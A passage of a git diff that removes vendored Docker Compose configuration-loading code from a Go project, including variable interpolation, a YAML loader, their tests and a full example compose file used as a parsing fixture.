-	for _, vol := range invalids {
-		_, err := convertVolumeToMount(vol, map[string]composetypes.VolumeConfig{}, namespace)
-		assert.Error(t, err, "invalid volume: "+vol)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go
deleted file mode 100644
index 734f28ec9d..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation.go
+++ /dev/null
@@ -1,90 +0,0 @@
-package interpolation
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/cli/compose/template"
-	"github.com/docker/docker/cli/compose/types"
-)
-
-// Interpolate replaces variables in a string with the values from a mapping
-func Interpolate(config types.Dict, section string, mapping template.Mapping) (types.Dict, error) {
-	out := types.Dict{}
-
-	for name, item := range config {
-		if item == nil {
-			out[name] = nil
-			continue
-		}
-		interpolatedItem, err := interpolateSectionItem(name, item.(types.Dict), section, mapping)
-		if err != nil {
-			return nil, err
-		}
-		out[name] = interpolatedItem
-	}
-
-	return out, nil
-}
-
-func interpolateSectionItem(
-	name string,
-	item types.Dict,
-	section string,
-	mapping template.Mapping,
-) (types.Dict, error) {
-
-	out := types.Dict{}
-
-	for key, value := range item {
-		interpolatedValue, err := recursiveInterpolate(value, mapping)
-		if err != nil {
-			return nil, fmt.Errorf(
-				"Invalid interpolation format for %#v option in %s %#v: %#v",
-				key, section, name, err.Template,
-			)
-		}
-		out[key] = interpolatedValue
-	}
-
-	return out, nil
-
-}
-
-func recursiveInterpolate(
-	value interface{},
-	mapping template.Mapping,
-) (interface{}, *template.InvalidTemplateError) {
-
-	switch value := value.(type) {
-
-	case string:
-		return template.Substitute(value, mapping)
-
-	case types.Dict:
-		out := types.Dict{}
-		for key, elem := range value {
-			interpolatedElem, err := recursiveInterpolate(elem, mapping)
-			if err != nil {
-				return nil, err
-			}
-			out[key] = interpolatedElem
-		}
-		return out, nil
-
-	case []interface{}:
-		out := make([]interface{}, len(value))
-		for i, elem := range value {
-			interpolatedElem, err := recursiveInterpolate(elem, mapping)
-			if err != nil {
-				return nil, err
-			}
-			out[i] = interpolatedElem
-		}
-		return out, nil
-
-	default:
-		return value, nil
-
-	}
-
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go b/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go
deleted file mode 100644
index c3921701b3..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/interpolation/interpolation_test.go
+++ /dev/null
@@ -1,59 +0,0 @@
-package interpolation
-
-import (
-	"testing"
-
-	"github.com/stretchr/testify/assert"
-
-	"github.com/docker/docker/cli/compose/types"
-)
-
-var defaults = map[string]string{
-	"USER": "jenny",
-	"FOO":  "bar",
-}
-
-func defaultMapping(name string) (string, bool) {
-	val, ok := defaults[name]
-	return val, ok
-}
-
-func TestInterpolate(t *testing.T) {
-	services := types.Dict{
-		"servicea": types.Dict{
-			"image":   "example:${USER}",
-			"volumes": []interface{}{"$FOO:/target"},
-			"logging": types.Dict{
-				"driver": "${FOO}",
-				"options": types.Dict{
-					"user": "$USER",
-				},
-			},
-		},
-	}
-	expected := types.Dict{
-		"servicea": types.Dict{
-			"image":   "example:jenny",
-			"volumes": []interface{}{"bar:/target"},
-			"logging": types.Dict{
-				"driver": "bar",
-				"options": types.Dict{
-					"user": "jenny",
-				},
-			},
-		},
-	}
-	result, err := Interpolate(services, "service", defaultMapping)
-	assert.NoError(t, err)
-	assert.Equal(t, expected, result)
-}
-
-func TestInvalidInterpolation(t *testing.T) {
-	services := types.Dict{
-		"servicea": types.Dict{
-			"image": "${",
-		},
-	}
-	_, err := Interpolate(services, "service", defaultMapping)
-	assert.EqualError(t, err, `Invalid interpolation format for "image" option in service "servicea": "${"`)
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example1.env b/vendor/github.com/docker/docker/cli/compose/loader/example1.env
deleted file mode 100644
index 3e7a059613..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/loader/example1.env
+++ /dev/null
@@ -1,8 +0,0 @@
-# passed through
-FOO=1
-
-# overridden in example2.env
-BAR=1
-
-# overridden in full-example.yml
-BAZ=1
diff --git a/vendor/github.com/docker/docker/cli/compose/loader/example2.env b/vendor/github.com/docker/docker/cli/compose/loader/example2.env
deleted file mode 100644
index 0920d5ab05..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/loader/example2.env
+++ /dev/null
@@ -1 +0,0 @@
-BAR=2
diff --git a/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml b/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml
deleted file mode 100644
index fb5686a380..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/loader/full-example.yml
+++ /dev/null
@@ -1,287 +0,0 @@
-version: "3"
-
-services:
-  foo:
-    cap_add:
-      - ALL
-
-    cap_drop:
-      - NET_ADMIN
-      - SYS_ADMIN
-
-    cgroup_parent: m-executor-abcd
-
-    # String or list
-    command: bundle exec thin -p 3000
-    # command: ["bundle", "exec", "thin", "-p", "3000"]
-
-    container_name: my-web-container
-
-    depends_on:
-      - db
-      - redis
-
-    deploy:
-      mode: replicated
-      replicas: 6
-      labels: [FOO=BAR]
-      update_config:
-        parallelism: 3
-        delay: 10s
-        failure_action: continue
-        monitor: 60s
-        max_failure_ratio: 0.3
-      resources:
-        limits:
-          cpus: '0.001'
-          memory: 50M
-        reservations:
-          cpus: '0.0001'
-          memory: 20M
-      restart_policy:
-        condition: on_failure
-        delay: 5s
-        max_attempts: 3
-        window: 120s
-      placement:
-        constraints: [node=foo]
-
-    devices:
-      - "/dev/ttyUSB0:/dev/ttyUSB0"
-
-    # String or list
-    # dns: 8.8.8.8
-    dns:
-      - 8.8.8.8
-      - 9.9.9.9
-
-    # String or list
-    # dns_search: example.com
-    dns_search:
-      - dc1.example.com
-      - dc2.example.com
-
-    domainname: foo.com
-
-    # String or list
-    # entrypoint: /code/entrypoint.sh -p 3000
-    entrypoint: ["/code/entrypoint.sh", "-p", "3000"]
-
-    # String or list
-    # env_file: .env
-    env_file:
-      - ./example1.env
-      - ./example2.env
-
-    # Mapping or list
-    # Mapping values can be strings, numbers or null
-    # Booleans are not allowed - must be quoted
-    environment:
-      RACK_ENV: development
-      SHOW: 'true'
-      SESSION_SECRET:
-      BAZ: 3
-    # environment:
-    #   - RACK_ENV=development
-    #   - SHOW=true
-    #   - SESSION_SECRET
-
-    # Items can be strings or numbers
-    expose:
-     - "3000"
-     - 8000
-
-    external_links:
-      - redis_1
-      - project_db_1:mysql
-      - project_db_1:postgresql
-
-    # Mapping or list
-    # Mapping values must be strings
-    # extra_hosts:
-    #   somehost: "162.242.195.82"
-    #   otherhost: "50.31.209.229"
-    extra_hosts:
-      - "somehost:162.242.195.82"
-      - "otherhost:50.31.209.229"
-
-    hostname: foo
-
-    healthcheck:
-      test: echo "hello world"
-      interval: 10s
-      timeout: 1s
-      retries: 5
-
-    # Any valid image reference - repo, tag, id, sha
-    image: redis
-    # image: ubuntu:14.04
-    # image: tutum/influxdb
-    # image: example-registry.com:4000/postgresql
-    # image: a4bc65fd
-    # image: busybox@sha256:38a203e1986cf79639cfb9b2e1d6e773de84002feea2d4eb006b52004ee8502d
-
-    ipc: host
-
-    # Mapping or list
-    # Mapping values can be strings, numbers or null
-    labels:
-      com.example.description: "Accounting webapp"
-      com.example.number: 42
-      com.example.empty-label:
-    # labels:
-    #   - "com.example.description=Accounting webapp"
-    #   - "com.example.number=42"
-    #   - "com.example.empty-label"
-
-    links:
-     - db
-     - db:database
-     - redis
-
-    logging:
-      driver: syslog
-      options:
-        syslog-address: "tcp://192.168.0.42:123"
-
-    mac_address: 02:42:ac:11:65:43
-
-    # network_mode: "bridge"
-    # network_mode: "host"
-    # network_mode: "none"
-    # Use the network mode of an arbitrary container from another service
-    # network_mode: "service:db"
-    # Use the network mode of another container, specified by name or id
-    # network_mode: "container:some-container"
-    network_mode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b"
-
-    networks:
-      some-network:
-        aliases:
-         - alias1
-         - alias3
-      other-network:
-        ipv4_address: 172.16.238.10
-        ipv6_address: 2001:3984:3989::10
-      other-other-network:
-
-    pid: "host"
-
-    ports:
-      - 3000
-      - "3000-3005"
-      - "8000:8000"
-      - "9090-9091:8080-8081"
-      - "49100:22"
-      - "127.0.0.1:8001:8001"
-      - "127.0.0.1:5000-5010:5000-5010"
-
-    privileged: true
-
-    read_only: true
-
-    restart: always
-
-    security_opt:
-      - label=level:s0:c100,c200
-      - label=type:svirt_apache_t
-
-    stdin_open: true
-
-    stop_grace_period: 20s
-
-    stop_signal: SIGUSR1
-
-    # String or list
-    # tmpfs: /run
-    tmpfs:
-      - /run
-      - /tmp
-
-    tty: true
-
-    ulimits:
-      # Single number or mapping with soft + hard limits
-      nproc: 65535
-      nofile:
-        soft: 20000
-        hard: 40000
-
-    user: someone
-
-    volumes:
-      # Just specify a path and let the Engine create a volume
-      - /var/lib/mysql
-      # Specify an absolute path mapping
-      - /opt/data:/var/lib/mysql
-      # Path on the host, relative to the Compose file
-      - .:/code
-      - ./static:/var/www/html
-      # User-relative path
-      - ~/configs:/etc/configs/:ro
-      # Named volume
-      - datavolume:/var/lib/mysql
-
-    working_dir: /code
-
-networks:
-  # Entries can be null, which specifies simply that a network
-  # called "{project name}_some-network" should be created and
-  # use the default driver
-  some-network:
-
-  other-network:
-    driver: overlay
-
-    driver_opts:
-      # Values can be strings or numbers
-      foo: "bar"
-      baz: 1
-
-    ipam:
-      driver: overlay
-      # driver_opts:
-      #   # Values can be strings or numbers
-      #   com.docker.network.enable_ipv6: "true"
-      #   com.docker.network.numeric_value: 1
-      config:
-      - subnet: 172.16.238.0/24
-        # gateway: 172.16.238.1
-      - subnet: 2001:3984:3989::/64
-        # gateway: 2001:3984:3989::1
-
-  external-network:
-    # Specifies that a pre-existing network called "external-network"
-    # can be referred to within this file as "external-network"
-    external: true
-
-  other-external-network:
-    # Specifies that a pre-existing network called "my-cool-network"
-    # can be referred to within this file as "other-external-network"
-    external:
-      name: my-cool-network
-
-volumes:
-  # Entries can be null, which specifies simply that a volume
-  # called "{project name}_some-volume" should be created and
-  # use the default driver
-  some-volume:
-
-  other-volume:
-    driver: flocker
-
-    driver_opts:
-      # Values can be strings or numbers
-      foo: "bar"
-      baz: 1
-
-  external-volume:
-    # Specifies that a pre-existing volume called "external-volume"
-    # can be referred to within this file as "external-volume"
-    external: true
-
-  other-external-volume:
-    # Specifies that a pre-existing volume called "my-cool-volume"
-    # can be referred to within this file as "other-external-volume"
-    external:
-      name: my-cool-volume
diff --git a/vendor/github.com/docker/docker/cli/compose/loader/loader.go b/vendor/github.com/docker/docker/cli/compose/loader/loader.go
deleted file mode 100644
index 39f69a03ff..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/loader/loader.go
+++ /dev/null
@@ -1,653 +0,0 @@
-package loader
-
-import (
-	"fmt"
-	"os"
-	"path"
-	"reflect"
-	"regexp"
-	"sort"
-	"strings"
-
-	"github.com/docker/docker/cli/compose/interpolation"
-	"github.com/docker/docker/cli/compose/schema"
-	"github.com/docker/docker/cli/compose/types"
-	"github.com/docker/docker/runconfig/opts"
-	units "github.com/docker/go-units"
-	shellwords "github.com/mattn/go-shellwords"
-	"github.com/mitchellh/mapstructure"
-	yaml "gopkg.in/yaml.v2"
-)
-
-var (
-	fieldNameRegexp = regexp.MustCompile("[A-Z][a-z0-9]+")
-)
-
-// ParseYAML reads the bytes from a file, parses the bytes into a mapping
-// structure, and returns it.
-func ParseYAML(source []byte) (types.Dict, error) {
-	var cfg interface{}
-	if err := yaml.Unmarshal(source, &cfg); err != nil {
-		return nil, err
-	}
-	cfgMap, ok := cfg.(map[interface{}]interface{})
-	if !ok {
-		return nil, fmt.Errorf("Top-level object must be a mapping")
-	}
-	converted, err := convertToStringKeysRecursive(cfgMap, "")
-	if err != nil {
-		return nil, err
-	}
-	return converted.(types.Dict), nil
-}
-
-// Load reads a ConfigDetails and returns a fully loaded configuration
-func Load(configDetails types.ConfigDetails) (*types.Config, error) {
-	if len(configDetails.ConfigFiles) < 1 {
-		return nil, fmt.Errorf("No files specified")
-	}
-	if len(configDetails.ConfigFiles) > 1 {
-		return nil, fmt.Errorf("Multiple files are not yet supported")
-	}
-
-	configDict := getConfigDict(configDetails)
-
-	if services, ok := configDict["services"]; ok {
-		if servicesDict, ok := services.(types.Dict); ok {
-			forbidden := getProperties(servicesDict, types.ForbiddenProperties)
-
-			if len(forbidden) > 0 {
-				return nil, &ForbiddenPropertiesError{Properties: forbidden}
-			}
-		}
-	}
-
-	if err := schema.Validate(configDict, schema.Version(configDict)); err != nil {
-		return nil, err
-	}
-
-	cfg := types.Config{}
-	if services, ok := configDict["services"]; ok {
-		servicesConfig, err := interpolation.Interpolate(services.(types.Dict), "service", os.LookupEnv)
-		if err != nil {
-			return nil, err
-		}
-
-		servicesList, err := loadServices(servicesConfig, configDetails.WorkingDir)
-		if err != nil {
-			return nil, err
-		}
-
-		cfg.Services = servicesList
-	}
-
-	if networks, ok := configDict["networks"]; ok {
-		networksConfig, err := interpolation.Interpolate(networks.(types.Dict), "network", os.LookupEnv)
-		if err != nil {
-			return nil, err
-		}
-
-		networksMapping, err := loadNetworks(networksConfig)
-		if err != nil {
-			return nil, err
-		}
-
-		cfg.Networks = networksMapping
-	}
-
-	if volumes, ok := configDict["volumes"]; ok {
-		volumesConfig, err := interpolation.Interpolate(volumes.(types.Dict), "volume", os.LookupEnv)
-		if err != nil {
-			return nil, err
-		}
-
-		volumesMapping, err := loadVolumes(volumesConfig)
-		if err != nil {
-			return nil, err
-		}
-
-		cfg.Volumes = volumesMapping
-	}
-
-	if secrets, ok := configDict["secrets"]; ok {
-		secretsConfig, err := interpolation.Interpolate(secrets.(types.Dict), "secret", os.LookupEnv)
-		if err != nil {
-			return nil, err
-		}
-
-		secretsMapping, err := loadSecrets(secretsConfig, configDetails.WorkingDir)
-		if err != nil {
-			return nil, err
-		}
-
-		cfg.Secrets = secretsMapping
-	}
-
-	return &cfg, nil
-}
-
-// GetUnsupportedProperties returns the list of any unsupported properties that are
-// used in the Compose files.
-func GetUnsupportedProperties(configDetails types.ConfigDetails) []string {
-	unsupported := map[string]bool{}
-
-	for _, service := range getServices(getConfigDict(configDetails)) {
-		serviceDict := service.(types.Dict)
-		for _, property := range types.UnsupportedProperties {
-			if _, isSet := serviceDict[property]; isSet {
-				unsupported[property] = true
-			}
-		}
-	}
-
-	return sortedKeys(unsupported)
-}
-
-func sortedKeys(set map[string]bool) []string {
-	var keys []string
-	for key := range set {
-		keys = append(keys, key)
-	}
-	sort.Strings(keys)
-	return keys
-}
-
-// GetDeprecatedProperties returns the list of any deprecated properties that
-// are used in the compose files.
-func GetDeprecatedProperties(configDetails types.ConfigDetails) map[string]string {
-	return getProperties(getServices(getConfigDict(configDetails)), types.DeprecatedProperties)
-}
-
-func getProperties(services types.Dict, propertyMap map[string]string) map[string]string {
-	output := map[string]string{}
-
-	for _, service := range services {
-		if serviceDict, ok := service.(types.Dict); ok {
-			for property, description := range propertyMap {
-				if _, isSet := serviceDict[property]; isSet {
-					output[property] = description
-				}
-			}
-		}
-	}
-
-	return output
-}
-
-// ForbiddenPropertiesError is returned when there are properties in the Compose
-// file that are forbidden.
-type ForbiddenPropertiesError struct {
-	Properties map[string]string
-}
-
-func (e *ForbiddenPropertiesError) Error() string {
-	return "Configuration contains forbidden properties"
-}
-
-// TODO: resolve multiple files into a single config
-func getConfigDict(configDetails types.ConfigDetails) types.Dict {
-	return configDetails.ConfigFiles[0].Config
-}
-
-func getServices(configDict types.Dict) types.Dict {
-	if services, ok := configDict["services"]; ok {
-		if servicesDict, ok := services.(types.Dict); ok {
-			return servicesDict
-		}
-	}
-
-	return types.Dict{}
-}
-
-func transform(source map[string]interface{}, target interface{}) error {
-	data := mapstructure.Metadata{}
-	config := &mapstructure.DecoderConfig{
-		DecodeHook: mapstructure.ComposeDecodeHookFunc(
-			transformHook,
-			mapstructure.StringToTimeDurationHookFunc()),
-		Result:   target,
-		Metadata: &data,
-	}
-	decoder, err := mapstructure.NewDecoder(config)
-	if err != nil {
-		return err
-	}
-	err = decoder.Decode(source)
-	// TODO: log unused keys
-	return err
-}
-
-func transformHook(
-	source reflect.Type,
-	target reflect.Type,
-	data interface{},
-) (interface{}, error) {
-	switch target {
-	case reflect.TypeOf(types.External{}):
-		return transformExternal(data)
-	case reflect.TypeOf(make(map[string]string, 0)):
-		return transformMapStringString(source, target, data)
-	case reflect.TypeOf(types.UlimitsConfig{}):
-		return transformUlimits(data)
-	case reflect.TypeOf(types.UnitBytes(0)):
-		return loadSize(data)
-	case reflect.TypeOf(types.ServiceSecretConfig{}):
-		return transformServiceSecret(data)
-	}
-	switch target.Kind() {
-	case reflect.Struct:
-		return transformStruct(source, target, data)
-	}
-	return data, nil
-}
-
-// keys needs to be converted to strings for jsonschema
-// TODO: don't use types.Dict
-func convertToStringKeysRecursive(value interface{}, keyPrefix string) (interface{}, error) {
-	if mapping, ok := value.(map[interface{}]interface{}); ok {
-		dict := make(types.Dict)
-		for key, entry := range mapping {
-			str, ok := key.(string)
-			if !ok {
-				var location string
-				if keyPrefix == "" {
-					location = "at top level"
-				} else {
-					location = fmt.Sprintf("in %s", keyPrefix)
-				}
-				return nil, fmt.Errorf("Non-string key %s: %#v", location, key)
-			}
-			var newKeyPrefix string
-			if keyPrefix == "" {
-				newKeyPrefix = str
-			} else {
-				newKeyPrefix = fmt.Sprintf("%s.%s", keyPrefix, str)
-			}
-			convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix)
-			if err != nil {
-				return nil, err
-			}
-			dict[str] = convertedEntry
-		}
-		return dict, nil
-	}
-	if list, ok := value.([]interface{}); ok {
-		var convertedList []interface{}
-		for index, entry := range list {
-			newKeyPrefix := fmt.Sprintf("%s[%d]", keyPrefix, index)
-			convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix)
-			if err != nil {
-				return nil, err
-			}
-			convertedList = append(convertedList, convertedEntry)
-		}
-		return convertedList, nil
-	}
-	return value, nil
-}
-
-func loadServices(servicesDict types.Dict, workingDir string) ([]types.ServiceConfig, error) {
-	var services []types.ServiceConfig
-
-	for name, serviceDef := range servicesDict {
-		serviceConfig, err := loadService(name, serviceDef.(types.Dict), workingDir)
-		if err != nil {
-			return nil, err
-		}
-		services = append(services, *serviceConfig)
-	}
-
-	return services, nil
-}
-
-func loadService(name string, serviceDict types.Dict, workingDir string) (*types.ServiceConfig, error) {
-	serviceConfig := &types.ServiceConfig{}
-	if err := transform(serviceDict, serviceConfig); err != nil {
-		return nil, err
-	}
-	serviceConfig.Name = name
-
-	if err := resolveEnvironment(serviceConfig, serviceDict, workingDir); err != nil {
-		return nil, err
-	}
-
-	if err := resolveVolumePaths(serviceConfig.Volumes, workingDir); err != nil {
-		return nil, err
-	}
-
-	return serviceConfig, nil
-}
-
-func resolveEnvironment(serviceConfig *types.ServiceConfig, serviceDict types.Dict, workingDir string) error {
-	environment := make(map[string]string)
-
-	if envFileVal, ok := serviceDict["env_file"]; ok {
-		envFiles := loadStringOrListOfStrings(envFileVal)
-
-		var envVars []string
-
-		for _, file := range envFiles {
-			filePath := absPath(workingDir, file)
-			fileVars, err := opts.ParseEnvFile(filePath)
-			if err != nil {
-				return err
-			}
-			envVars = append(envVars, fileVars...)
-		}
-
-		for k, v := range opts.ConvertKVStringsToMap(envVars) {
-			environment[k] = v
-		}
-	}
-
-	for k, v := range serviceConfig.Environment {
-		environment[k] = v
-	}
-
-	serviceConfig.Environment = environment
-
-	return nil
-}
-
-func resolveVolumePaths(volumes []string, workingDir string) error {
-	for i, mapping := range volumes {
-		parts := strings.SplitN(mapping, ":", 2)
-		if len(parts) == 1 {
-			continue
-		}
-
-		if strings.HasPrefix(parts[0], ".") {
-			parts[0] = absPath(workingDir, parts[0])
-		}
-		parts[0] = expandUser(parts[0])
-
-		volumes[i] = strings.Join(parts, ":")
-	}
-
-	return nil
-}
-
-// TODO: make this more robust
-func expandUser(path string) string {
-	if strings.HasPrefix(path, "~") {
-		return strings.Replace(path, "~", os.Getenv("HOME"), 1)
-	}
-	return path
-}
-
-func transformUlimits(data interface{}) (interface{}, error) {
-	switch value := data.(type) {
-	case int:
-		return types.UlimitsConfig{Single: value}, nil
-	case types.Dict:
-		ulimit := types.UlimitsConfig{}
-		ulimit.Soft = value["soft"].(int)
-		ulimit.Hard = value["hard"].(int)
-		return ulimit, nil
-	default:
-		return data, fmt.Errorf("invalid type %T for ulimits", value)
-	}
-}
-
-func loadNetworks(source types.Dict) (map[string]types.NetworkConfig, error) {
-	networks := make(map[string]types.NetworkConfig)
-	err := transform(source, &networks)
-	if err != nil {
-		return networks, err
-	}
-	for name, network := range networks {
-		if network.External.External && network.External.Name == "" {
-			network.External.Name = name
-			networks[name] = network
-		}
-	}
-	return networks, nil
-}
-
-func loadVolumes(source types.Dict) (map[string]types.VolumeConfig, error) {
-	volumes := make(map[string]types.VolumeConfig)
-	err := transform(source, &volumes)
-	if err != nil {
-		return volumes, err
-	}
-	for name, volume := range volumes {
-		if volume.External.External && volume.External.Name == "" {
-			volume.External.Name = name
-			volumes[name] = volume
-		}
-	}
-	return volumes, nil
-}
-
-// TODO: remove duplicate with networks/volumes
-func loadSecrets(source types.Dict, workingDir string) (map[string]types.SecretConfig, error) {
-	secrets := make(map[string]types.SecretConfig)
-	if err := transform(source, &secrets); err != nil {
-		return secrets, err
-	}
-	for name, secret := range secrets {
-		if secret.External.External && secret.External.Name == "" {
-			secret.External.Name = name
-			secrets[name] = secret
-		}
-		if secret.File != "" {
-			secret.File = absPath(workingDir, secret.File)
-		}
-	}
-	return secrets, nil
-}
-
-func absPath(workingDir string, filepath string) string {
-	if path.IsAbs(filepath) {
-		return filepath
-	}
-	return path.Join(workingDir, filepath)
-}
-
-func transformStruct(
-	source reflect.Type,
-	target reflect.Type,
-	data interface{},
-) (interface{}, error) {
-	structValue, ok := data.(map[string]interface{})
-	if !ok {
-		// FIXME: this is necessary because of convertToStringKeysRecursive
-		structValue, ok = data.(types.Dict)
-		if !ok {
-			panic(fmt.Sprintf(
-				"transformStruct called with non-map type: %T, %s", data, data))
-		}
-	}
-
-	var err error
-	for i := 0; i < target.NumField(); i++ {
-		field := target.Field(i)
-		fieldTag := field.Tag.Get("compose")
-
-		yamlName := toYAMLName(field.Name)
-		value, ok := structValue[yamlName]
-		if !ok {
-			continue
-		}
-
-		structValue[yamlName], err = convertField(
-			fieldTag, reflect.TypeOf(value), field.Type, value)
-		if err != nil {
-			return nil, fmt.Errorf("field %s: %s", yamlName, err.Error())
-		}
-	}
-	return structValue, nil
-}
-
-func transformMapStringString(
-	source reflect.Type,
-	target reflect.Type,
-	data interface{},
-) (interface{}, error) {
-	switch value := data.(type) {
-	case map[string]interface{}:
-		return toMapStringString(value), nil
-	case types.Dict:
-		return toMapStringString(value), nil
-	case map[string]string:
-		return value, nil
-	default:
-		return data, fmt.Errorf("invalid type %T for map[string]string", value)
-	}
-}
-
-func convertField(
-	fieldTag string,
-	source reflect.Type,
-	target reflect.Type,
-	data interface{},
-) (interface{}, error) {
-	switch fieldTag {
-	case "":
-		return data, nil
-	case "healthcheck":
-		return loadHealthcheck(data)
-	case "list_or_dict_equals":
-		return loadMappingOrList(data, "="), nil
-	case "list_or_dict_colon":
-		return loadMappingOrList(data, ":"), nil
-	case "list_or_struct_map":
-		return loadListOrStructMap(data, target)
-	case "string_or_list":
-		return loadStringOrListOfStrings(data), nil
-	case "list_of_strings_or_numbers":
-		return loadListOfStringsOrNumbers(data), nil
-	case "shell_command":
-		return loadShellCommand(data)
-	case "size":
-		return loadSize(data)
-	case "-":
-		return nil, nil
-	}
-	return data, nil
-}
-
-func transformExternal(data interface{}) (interface{}, error) {
-	switch value := data.(type) {
-	case bool:
-		return map[string]interface{}{"external": value}, nil
-	case types.Dict:
-		return map[string]interface{}{"external": true, "name": value["name"]}, nil
-	case map[string]interface{}:
-		return map[string]interface{}{"external": true, "name": value["name"]}, nil
-	default:
-		return data, fmt.Errorf("invalid type %T for external", value)
-	}
-}
-
-func transformServiceSecret(data interface{}) (interface{}, error) {
-	switch value := data.(type) {
-	case string:
-		return map[string]interface{}{"source": value}, nil
-	case types.Dict:
-		return data, nil
-	case map[string]interface{}:
-		return data, nil
-	default:
-		return data, fmt.Errorf("invalid type %T for external", value)
-	}
-
-}
-
-func toYAMLName(name string) string {
-	nameParts := fieldNameRegexp.FindAllString(name, -1)
-	for i, p := range nameParts {
-		nameParts[i] = strings.ToLower(p)
-	}
-	return strings.Join(nameParts, "_")
-}
-
-func loadListOrStructMap(value interface{}, target reflect.Type) (interface{}, error) {
-	if list, ok := value.([]interface{}); ok {
-		mapValue := map[interface{}]interface{}{}
-		for _, name := range list {
-			mapValue[name] = nil
-		}
-		return mapValue, nil
-	}
-
-	return value, nil
-}
-
-func loadListOfStringsOrNumbers(value interface{}) []string {
-	list := value.([]interface{})
-	result := make([]string, len(list))
-	for i, item := range list {
-		result[i] = fmt.Sprint(item)
-	}
-	return result
-}
-
-func loadStringOrListOfStrings(value interface{}) []string {
-	if list, ok := value.([]interface{}); ok {
-		result := make([]string, len(list))
-		for i, item := range list {
-			result[i] = fmt.Sprint(item)
-		}
-		return result
-	}
-	return []string{value.(string)}
-}
-
-func loadMappingOrList(mappingOrList interface{}, sep string) map[string]string {
-	if mapping, ok := mappingOrList.(types.Dict); ok {
-		return toMapStringString(mapping)
-	}
-	if list, ok := mappingOrList.([]interface{}); ok {
-		result := make(map[string]string)
-		for _, value := range list {
-			parts := strings.SplitN(value.(string), sep, 2)
-			if len(parts) == 1 {
-				result[parts[0]] = ""
-			} else {
-				result[parts[0]] = parts[1]
-			}
-		}
-		return result
-	}
-	panic(fmt.Errorf("expected a map or a slice, got: %#v", mappingOrList))
-}
-
-func loadShellCommand(value interface{}) (interface{}, error) {
-	if str, ok := value.(string); ok {
-		return shellwords.Parse(str)
-	}
-	return value, nil
-}
-
-func loadHealthcheck(value interface{}) (interface{}, error) {
-	if str, ok := value.(string); ok {
-		return append([]string{"CMD-SHELL"}, str), nil
-	}
-	return value, nil
-}
-
-func loadSize(value interface{}) (int64, error) {
-	switch value := value.(type) {
-	case int:
-		return int64(value), nil
-	case string:
-		return units.RAMInBytes(value)
-	}
-	panic(fmt.Errorf("invalid type for size %T", value))
-}
-
-func toMapStringString(value map[string]interface{}) map[string]string {
-	output := make(map[string]string)
-	for key, value := range value {
-		output[key] = toString(value)
-	}
-	return output
-}
-
-func toString(value interface{}) string {
-	if value == nil {
-		return ""
-	}
-	return fmt.Sprint(value)
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go b/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go
deleted file mode 100644
index f7fee89ede..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go
+++ /dev/null
@@ -1,800 +0,0 @@
-package loader
-
-import (
-	"fmt"
-	"io/ioutil"
-	"os"
-	"sort"
-	"testing"
-	"time"
-
-	"github.com/docker/docker/cli/compose/types"
-	"github.com/stretchr/testify/assert"
-)
-
-func buildConfigDetails(source types.Dict) types.ConfigDetails {
-	workingDir, err := os.Getwd()
-	if err != nil {
-		panic(err)
-	}
-
-	return types.ConfigDetails{
-		WorkingDir: workingDir,
-		ConfigFiles: []types.ConfigFile{
-			{Filename: "filename.yml", Config: source},
-		},
-		Environment: nil,
-	}
-}
-
-var sampleYAML = `
-version: "3"
-services:
-  foo:
-    image: busybox
-    networks:
-      with_me:
-  bar:
-    image: busybox
-    environment:
-      - FOO=1
-    networks:
-      - with_ipam
-volumes:
-  hello:
-    driver: default
-    driver_opts:
-      beep: boop
-networks:
-  default:
-    driver: bridge
-    driver_opts:
-      beep: boop
-  with_ipam:
-    ipam:
-      driver: default
-      config:
-        - subnet: 172.28.0.0/16
-`
-
-var sampleDict = types.Dict{
-	"version": "3",
-	"services": types.Dict{
-		"foo": types.Dict{
-			"image":    "busybox",
-			"networks": types.Dict{"with_me": nil},
-		},
-		"bar": types.Dict{
-			"image":       "busybox",
-			"environment": []interface{}{"FOO=1"},
-			"networks":    []interface{}{"with_ipam"},
-		},
-	},
-	"volumes": types.Dict{
-		"hello": types.Dict{
-			"driver": "default",
-			"driver_opts": types.Dict{
-				"beep": "boop",
-			},
-		},
-	},
-	"networks": types.Dict{
-		"default": types.Dict{
-			"driver": "bridge",
-			"driver_opts": types.Dict{
-				"beep": "boop",
-			},
-		},
-		"with_ipam": types.Dict{
-			"ipam": types.Dict{
-				"driver": "default",
-				"config": []interface{}{
-					types.Dict{
-						"subnet": "172.28.0.0/16",
-					},
-				},
-			},
-		},
-	},
-}
-
-var sampleConfig = types.Config{
-	Services: []types.ServiceConfig{
-		{
-			Name:        "foo",
-			Image:       "busybox",
-			Environment: map[string]string{},
-			Networks: map[string]*types.ServiceNetworkConfig{
-				"with_me": nil,
-			},
-		},
-		{
-			Name:        "bar",
-			Image:       "busybox",
-			Environment: map[string]string{"FOO": "1"},
-			Networks: map[string]*types.ServiceNetworkConfig{
-				"with_ipam": nil,
-			},
-		},
-	},
-	Networks: map[string]types.NetworkConfig{
-		"default": {
-			Driver: "bridge",
-			DriverOpts: map[string]string{
-				"beep": "boop",
-			},
-		},
-		"with_ipam": {
-			Ipam: types.IPAMConfig{
-				Driver: "default",
-				Config: []*types.IPAMPool{
-					{
-						Subnet: "172.28.0.0/16",
-					},
-				},
-			},
-		},
-	},
-	Volumes: map[string]types.VolumeConfig{
-		"hello": {
-			Driver: "default",
-			DriverOpts: map[string]string{
-				"beep": "boop",
-			},
-		},
-	},
